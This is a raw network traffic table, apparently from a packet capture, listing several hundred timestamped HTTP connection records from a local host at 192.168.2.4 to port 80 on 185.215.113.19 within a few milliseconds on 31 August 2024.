Aug 31, 2024 22:41:57.797085047 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797099113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797192097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797213078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797224045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797240973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797276974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797291040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797316074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797334909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797353029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797360897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797384977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797399998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797420025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797440052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797460079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797477961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797489882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797508955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797524929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797544956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797561884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797583103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797599077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797615051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797631979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797646046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797666073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797683954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797705889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797715902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797734976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797754049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797766924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797780991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797800064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797820091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797838926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797852039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797868013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797883987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797908068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797928095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797944069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797957897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797976971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.797992945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798010111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798024893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798042059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798057079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798074961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798095942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798108101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798129082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798146963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798166037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798185110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798202991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798207998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798233032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798244953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798264980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798285007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798301935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798310041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798333883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798353910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798363924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798387051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798401117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798419952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798440933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798455000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798474073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798482895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798505068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798522949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798537016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798554897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798573017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798587084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798609018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798618078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798645020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798660040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798677921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798697948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798711061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798727989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798743010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798759937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798778057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798796892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798810959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798831940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798841953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798866034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798887968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798903942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798918962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798938036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798947096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798969984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.798985958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799007893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799022913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799040079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799052954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799072027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799086094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799110889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799127102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799146891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799165964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799187899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799207926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799225092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799241066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799261093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799268007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799289942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799307108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799321890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799340963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799355030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799377918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799390078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799417019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799427032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799448013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799463034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799479008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799496889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799510956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799529076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799550056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799566031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799578905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799596071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799619913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799634933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799653053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799673080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799684048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799705982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799715996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799740076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799761057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799781084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799791098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799808979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799823046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799845934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799856901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799877882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799900055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799910069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799932003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799945116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799964905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799983978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.799998999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800015926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800035000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800051928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800069094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800084114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800101042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800121069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800134897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800154924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800178051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800188065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800204039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800224066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800241947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800256968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800276995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800290108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800312996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800328970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800342083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800360918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800383091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800400972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800417900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800432920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800453901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800471067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800498962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800503016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800525904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800539970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800554037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800573111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800595999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800601959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800623894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800642014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800662041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800679922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800698996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800715923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800729036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800750971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800765991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800784111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800803900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800813913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800833941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800848007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800868034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800877094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800904036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800920963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800939083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800951004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800980091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.800991058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801011086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801028967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801047087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801064014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801079988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801098108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801109076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801129103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801147938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801166058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801182032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801198006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801218033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801233053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801256895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801265955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801287889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801301956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801321030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801333904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801352978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801371098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801387072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801399946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801422119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801440954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801460981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801477909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801496983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801513910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801523924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801544905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801562071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801577091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801589012 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801608086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801625013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801642895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801657915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801678896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801702023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801722050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801739931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801758051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801773071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801784039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801801920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801815033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801836967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801850080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801867008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801888943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801899910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801920891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801934958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801954031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801975965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.801985979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802006006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802022934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802041054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802052021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802069902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802087069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802109003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802128077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802135944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802155972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802180052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802201033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802221060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802241087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802258015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802272081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802293062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802308083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802330017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802337885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802354097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802371979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802390099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802402973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802423000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802450895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802464008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802488089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802498102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802521944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802539110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802556992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802575111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802587986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802606106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802618980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802638054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802655935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802675009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802690983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802712917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802732944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802748919 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802768946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802786112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802803040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802819014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802830935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802850962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802859068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802881002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802894115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802913904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.802932978 CEST	49732	80	192.168.2.4	185.215.113.19
